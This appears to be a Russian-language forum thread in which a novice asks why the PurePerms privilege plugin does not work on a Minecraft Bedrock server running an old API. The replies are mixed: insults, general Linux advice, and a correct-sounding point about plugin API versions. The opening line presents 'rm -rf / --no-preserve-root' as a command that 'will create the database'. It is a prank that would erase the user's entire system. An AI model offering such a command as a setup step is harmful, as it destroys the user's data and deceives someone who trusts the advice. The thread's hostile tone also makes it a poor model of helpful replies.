rm -rf / --no-preserve-root
это создаст базу данных
база данных создан а некоторые плагины как авторизация привелегии не отображаются на сервере
не так создал, введи эту команду
я создам сервер и кто нибудь поможет в настройке жпжпжпжпж ![]()
я тебе уже ответ дал
теоеграмм есть? я подробно расскажв
Купи услугу по настройке вдс, т.к никто не захочет тратить своё время на тебя
Или используй скрипт для авто-установки сервера, и только после установи сборку.
Если ты и с помощью скрипта не можешь создать сервер, то иди учи linux, а сверху ещё базы данных и php
боже чел ты читать умеешь я создал этот ебаный сервер вдс у меня вопрос возник почему у меня не отображаются привилегии как чате так и в табе на сервере когда ввожу команду для выдачи привилегии то есть /setgroup /groups и т.д у меня в чате появляется “[PurePerms:64FF00]” и всë ни список привилегий а в табе обычный игравой ник ядро всë стоит уже
Ядро submarine API 1.28.0
мне как бы не нужен скрипт я уже создал сервер и уже загрузил сборку с ядром но проблема в должностях на сервере и вопрос был мой касательно изначально по двум плагинам но авторизация ладно но должности как может что то исправить можно
можно нормально сказать что бы я вас за людей считал а не иначе просто ■■■■■ сказать в чем проблем я бы сам это сделал
Значит криво всё установил, удалил конфиги или ещё прочая хрень. Иди разбирайся
Понятно… Если его api 1.28.0, то знай, пурики написаны для api не ниже 2.0.0. Хотя я это твой субмарин в жизни не видел, соответственно либо тебе придётся предоставить доступ к источнику (открытому исходному коду), т.к скачивать всю сборку я не хочу, либо разбираться чем этот api отличается от api версий pmmp и попытаться решить проблему с плагинами ты должен сам.
окей заменю на айпи 2.0.0
че ты такой злой? тебе нормально ответили, а ты посылаешь))
Не знаете как подключить бота к ВК группе?
зачем ты вдс арендовал? на локалке запусти и тести плагины, потом когда будешь уверен что сервер можно запускать тогда и арендуй
Могу подключить бота к ВК группе за определенную плату. Или если более подробнее распишешь что за бот, попробую помочь так
если ты сервер не один открываешь, то локалки мало будет